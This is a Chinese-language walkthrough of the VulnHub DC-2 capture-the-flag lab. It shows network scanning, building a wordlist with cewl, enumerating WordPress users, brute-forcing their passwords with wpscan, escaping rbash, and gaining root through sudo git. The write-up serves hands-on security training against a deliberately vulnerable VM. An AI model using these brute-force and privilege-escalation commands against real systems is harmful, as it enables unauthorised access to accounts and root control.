vulnhub——DC-2

信息收集

确定目标

└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:9e:68:11, IPv4: 192.168.123.37
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.123.2     d4:8f:a2:9f:51:49       Huawei Device Co., Ltd.
192.168.123.9     30:03:c8:49:52:4d       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.123.5     3c:55:76:dc:ab:f5 (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.123.7     3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.123.8     e4:05:41:0c:9a:2c (42:f1:e2:49:51:a5)   (Unknown)
192.168.123.6     7c:b5:66:a5:f0:a5       Intel Corporate
192.168.123.177    00:0c:29:57:ff:26       VMware, Inc.
192.168.123.30    7c:b5:66:a5:f0:a5       Intel Corporate
192.168.123.41    7c:b5:66:a5:f0:a5       Intel Corporate
192.168.123.18    c4:75:ab:58:e4:8b       Intel Corporate
192.168.123.12    42:45:ab:5e:e9:ce       (Unknown: locally administered)

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.494 seconds (102.65 hosts/sec). 11 responded



192.168.123.177    00:0c:29:57:ff:26

扫描端口

└─# nmap -sV -p- 192.168.123.177
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-05 10:23 CST
Nmap scan report for 192.168.123.177
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:57:FF:26 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.71 seconds

flag 1

尝试访问80端口开放的web服务,显示无法访问,可能是重定向

修改hosts(windows:C:\Windows\System32\drivers\etc linux: /etc/hosts)文件,加入192.168.123.177 dc-2后,访问正常

右下角发现flag的菜单页

Welcome		What We Do	Our People	Our Products	Flag

FLAG
Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

标志 1:

你常用的单词表可能不起作用,所以,也许你只需要变得聪明。

密码越多越好,但有时你无法全部记住。

以一个身份登录,查看下一个标记。

如果你找不到它,请以另一个身份登录。

flag 2

提示中第一句提到了变得更聪明,而cewl也是一款工具

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。


┌──(root㉿kali)-[~]
└─# cewl http://dc-2 -w passwd.txt

CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Couldn't hit the site http://dc-2, moving on

┌──(root㉿kali)-[~]
└─# cat passwd.txt     #查看发现为空

┌──(root㉿kali)-[~]
└─# cewl http://192.168.1.36 -w passwd.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(root㉿kali)-[~]
└─# cat passwd.txt     #查看发现为空,想起开始的重定向,忘了给kali加上了……

┌──(root㉿kali)-[~]
└─# vim /etc/hosts

┌──(root㉿kali)-[~]
└─# systemctl restart networking.service

┌──(root㉿kali)-[~]
└─# cewl http://dc-2 -w passwd.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(root㉿kali)-[~]
└─# cat passwd.txt
sit
amet
nec
quis
vel
orci
site
……

接下来尝试找到账号和登录框,扫一下目录

┌──(root㉿kali)-[~]
└─# dirb http://192.168.123.177

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jan  6 19:33:09 2024
URL_BASE: http://192.168.123.177/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.123.177/ ----
+ http://192.168.123.177/index.php (CODE:200|SIZE:53562)
+ http://192.168.123.177/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.123.177/wp-admin/
==> DIRECTORY: http://192.168.123.177/wp-content/
==> DIRECTORY: http://192.168.123.177/wp-includes/
+ http://192.168.123.177/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.123.177/wp-admin/ ----
+ http://192.168.123.177/wp-admin/admin.php (CODE:302|SIZE:0)    #admin.php
==> DIRECTORY: http://192.168.123.177/wp-admin/css/
==> DIRECTORY: http://192.168.123.177/wp-admin/images/
==> DIRECTORY: http://192.168.123.177/wp-admin/includes/
+ http://192.168.123.177/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.123.177/wp-admin/js/
==> DIRECTORY: http://192.168.123.177/wp-admin/maint/
==> DIRECTORY: http://192.168.123.177/wp-admin/network/
==> DIRECTORY: http://192.168.123.177/wp-admin/user/

---- Entering directory: http://192.168.123.177/wp-content/ ----
+ http://192.168.123.177/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.123.177/wp-content/languages/
==> DIRECTORY: http://192.168.123.177/wp-content/plugins/
==> DIRECTORY: http://192.168.123.177/wp-content/themes/

---- Entering directory: http://192.168.123.177/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/network/ ----
+ http://192.168.123.177/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.123.177/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.123.177/wp-admin/user/ ----
+ http://192.168.123.177/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.123.177/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.123.177/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-content/plugins/ ----
+ http://192.168.123.177/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.123.177/wp-content/themes/ ----
+ http://192.168.123.177/wp-content/themes/index.php (CODE:200|SIZE:0)

-----------------
END_TIME: Sat Jan  6 19:33:33 2024
DOWNLOADED: 32284 - FOUND: 12

其中看到admin.php,访问看到wordpress的登录页。Wordpress有一个著名的扫描工具wpscan。

有密码字典缺用户名,枚举用户名

┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.123.177]
[+] Started: Sat Jan  6 20:25:50 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jan  6 20:25:52 2024
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 13.894 KB
[+] Data Received: 514.805 KB
[+] Memory used: 197.43 MB
[+] Elapsed time: 00:00:02

枚举了三个,admin、jerry、tom,同时创建一个文本user.txt,将其保存

完成后。使用wpscan爆破账号密码

┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/ -U user.txt -P passwd.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.123.177]
[+] Started: Sat Jan  6 20:58:06 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <========> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing   # 
[SUCCESS] - tom / parturient
Trying admin / log Time: 00:00:28 <=========       > (646 / 1121) 57.62%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jan  6 20:58:38 2024
[+] Requests Done: 819
[+] Cached Requests: 5
[+] Data Sent: 364.608 KB
[+] Data Received: 751.28 KB
[+] Memory used: 250.488 MB
[+] Elapsed time: 00:00:31

暴出两组,jerry / adipiscing tom / parturient

使用jerry登录后,点击左侧的Pages发现了flag 2

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

如果你不能利用WordPress并走捷径,还有另一种方法。

希望你能找到另一个切入点。

flag 3

说到另一个切入点,开始扫描端口时还有个端口改成7744的ssh服务

┌──(root㉿kali)-[~]
└─# ssh jerry@192.168.123.177 -p 7744
The authenticity of host '[192.168.123.177]:7744 ([192.168.123.177]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '[192.168.123.177]:7744' (ED25519) to the list of known hosts.
jerry@192.168.123.177's password:
Permission denied, please try again.    # 换另一个试试
jerry@192.168.123.177's password:


┌──(root㉿kali)-[~]
└─# ssh tom@192.168.123.177 -p 7744
tom@192.168.123.177's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found   # 被-rbash限制

tom@DC-2:~$ compgen -c   # 查看可使用的命令
if
then
else
elif
fi
……
less
scp
ls
vi

tom@DC-2:~$ vi flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

可怜的老汤姆总是追着杰瑞跑。也许他应该起诉杰瑞给他造成的所有压力

flag 4

提到了su,暗示我们提权

rbash环境变量的提权方法(这个方法也是收罗大佬的方法,其原理我也说不清,如果有大佬知道,望在评论区告知)

tom@DC-2:~$ export -p        //查看环境变量
declare -x HOME="/home/tom"
declare -x LANG="en_US.UTF-8"
declare -x LOGNAME="tom"
declare -x MAIL="/var/mail/tom"
declare -x OLDPWD
declare -rx PATH="/home/tom/usr/bin"
declare -x PWD="/home/tom"
declare -rx SHELL="/bin/rbash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.123.76 43952 7744"
declare -x SSH_CONNECTION="192.168.123.76 43952 192.168.123.177 7744"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="tom"   

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a  # 把/bin/sh给a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/  # 注:将/bin 作为PATH环境变量导出
tom@DC-2:~$ export PATH=$PATH:/usr/bin  # 注:将/usr/bin作为PATH环境变量导出

提权成功

tom@DC-2:~$ su - jerry  # 加上-可以
Password:
jerry@DC-2:~$ vi flag4.txt


Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

很高兴看到你们已经走了这么远,但你们还没到家。

你仍然需要获得最终的旗帜(唯一真正有价值的旗帜!!!)。

这里没有提示-现在您要靠自己了。

走开——滚出去!!!!

ps:
su 和 su -
- 前者只是切换了root身份,但**Shell环境仍然是普通用户的Shell**;  
- 而后者连用户和Shell环境一起切换成root身份了。**只有切换了Shell环境才不会出现PATH环境变量错误**。

flag 5

提到了git,可能会有个git提权,看这个意思估计是要我们拿下root了


jerry@DC-2:/home/tom$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su

ps:
find / -perm -u=s -type f 2>/dev/null
这是一个在Unix-like操作系统中使用的`find`命令,用于搜索文件系统。

1. `find`: 这是一个命令行工具,用于在文件系统中搜索文件和目录。
2. `/`: 这是搜索的起始点。在这里,它表示从文件系统的根目录开始搜索。
3. `-perm -u=s`: 这是一个权限选项,用于搜索具有特定权限的文件。

	* `-perm`: 表示根据文件的权限进行搜索。
	* `-u=s`: 表示搜索所有用户(u)具有setuid位(s)的文件。setuid位是一种特殊的权限,当设置了该位的文件被执行时,它会以文件所有者的身份运行,而不是运行者的身份。
4. `-type f`: 这是一个类型选项,表示只搜索普通文件(不包括目录、符号链接等其他类型的文件)。
5. `2>/dev/null`: 这是一个重定向操作,用于丢弃错误消息。具体来说,它将标准错误(文件描述符2)重定向到`/dev/null`,这样任何由于权限问题导致的错误消息都不会显示在屏幕上。

总结:这个命令的目的是查找文件系统中所有设置了setuid位的普通文件,并忽略任何由于权限问题产生的错误消息。


有个sudo

jerry@DC-2:/home/tom$ sudo -l  # 看看啥有sudo权限的
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

git是root权限

我们使用git提权,有两种方法

1、sudo git help config  
!/bin/bash 或 !'sh' # 在末行命令模式输入,完成提权 
2、sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

jerry@DC-2:~$ sudo git help config
root@DC-2:/home/jerry#

提权成功 获得root权限,切换到root目录下

root@DC-2:/home/tom# cd /root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

恭喜!!!

特别感谢所有给我发推特的人  
并为我提供了反馈,这对我非常重要  
感谢。

如果你喜欢这个CTF,请通过@DCAU7给我发一条推特。
ps:
在刚刚的rbash绕过时,如果只是想看看flag4的内容也可以使用下面这种简单的方法,即vi的命令模式提权
缺陷是能用的命令还是有限,但是多知道点方法总没错

vi随便打开文件
再下面添加
:set shell=/bin/sh
:shell

$      # 提权成功
$ cd ..
$ ls
jerry  tom
$ cd jerry
$ ls
flag4.txt
$ vi flag4.txt
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值